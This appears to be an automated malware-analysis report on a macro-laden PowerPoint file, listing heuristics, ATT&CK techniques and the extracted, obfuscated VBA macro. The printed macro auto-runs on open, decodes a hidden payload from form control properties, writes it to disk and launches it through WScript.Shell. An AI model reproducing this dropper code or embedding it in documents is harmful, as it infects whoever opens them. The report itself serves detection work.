MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
The sample is an OOXML document containing a VBA macro with an Auto_Open subroutine. This macro utilizes WScript.Shell and CreateObject to execute commands, a common technique for downloading and executing secondary payloads. The obfuscated script suggests an attempt to hide malicious activity, increasing suspicion.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2301 bytes |
SHA-256: 4ff20f5daa18e36a91e806b53da07c8ea8a31b1c952fefbdacb3869ad2dc6807 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "gGImpayBmTvqEpSpdEvHkGzjLpIjSa"
Public Sub aUtO_oPeN()
FytViFVklVwheYoHamUfTsiDamaosI.PygoEKzzPvLcbRlYtcFOzzEvLSEHrE
End Sub
Attribute VB_Name = "ciZLStDvTVhHOxVeSiaLGLDRJkWIYf"
Attribute VB_Base = "0{DF78E38B-5691-4E1C-AB48-44A6FF899686}{15EC2C6C-E32E-4E30-956F-8A0B2137EBEF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AZMyBJfyYriXlJeXlVbRVLpfvOBIUR"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function mkIdtMPzssjAHoSrggtiDrcffovRbW(yihkbxJdOkAHSpzvVlEwghrUuoWnat)
mkIdtMPzssjAHoSrggtiDrcffovRbW = Replace(yihkbxJdOkAHSpzvVlEwghrUuoWnat, "h/<\(}H#2tcvTTaa#bCL./]Ups8l{d", "")
End Function
Sub jfexMoXvkKwVkSyGHYZYvAPNwrnwHd()
Dim FatdwFIkLkBhjNiAcwuUbVPvFqKBTS As String: FatdwFIkLkBhjNiAcwuUbVPvFqKBTS = ciZLStDvTVhHOxVeSiaLGLDRJkWIYf.nYVhAwHIhYwsCCqGMFldpUGvPawSCm.Tag
Dim shl0 As String: shl0 = mkIdtMPzssjAHoSrggtiDrcffovRbW(FatdwFIkLkBhjNiAcwuUbVPvFqKBTS)
Open shl0 For Output As #1
Dim XThYRUfJVAJyvpzRXIXPXqwPSpSdbG As String: XThYRUfJVAJyvpzRXIXPXqwPSpSdbG = ciZLStDvTVhHOxVeSiaLGLDRJkWIYf.nYVhAwHIhYwsCCqGMFldpUGvPawSCm.ControlTipText
Dim TunxVCKxNVOELmEcBjCeoEBimVZxCb As String: TunxVCKxNVOELmEcBjCeoEBimVZxCb = mkIdtMPzssjAHoSrggtiDrcffovRbW(XThYRUfJVAJyvpzRXIXPXqwPSpSdbG)
Print #1, TunxVCKxNVOELmEcBjCeoEBimVZxCb
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set Janelha = CreateObject("WScript.Shell")
Set Ajuda = Janelha.exEc("C:\Windows\Explorer " & shl0)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
Attribute VB_Name = "FytViFVklVwheYoHamUfTsiDamaosI"
Public kCFwWitaHexxNYKoZYriybHtrmftMa As New AZMyBJfyYriXlJeXlVbRVLpfvOBIUR
Sub PygoEKzzPvLcbRlYtcFOzzEvLSEHrE()
kCFwWitaHexxNYKoZYriybHtrmftMa.jfexMoXvkKwVkSyGHYZYvAPNwrnwHd
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 39424 bytes |
SHA-256: 3c952054dcb24f231fd014005938bbf283cb092d5c74035ffc11436da4abdd8c |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.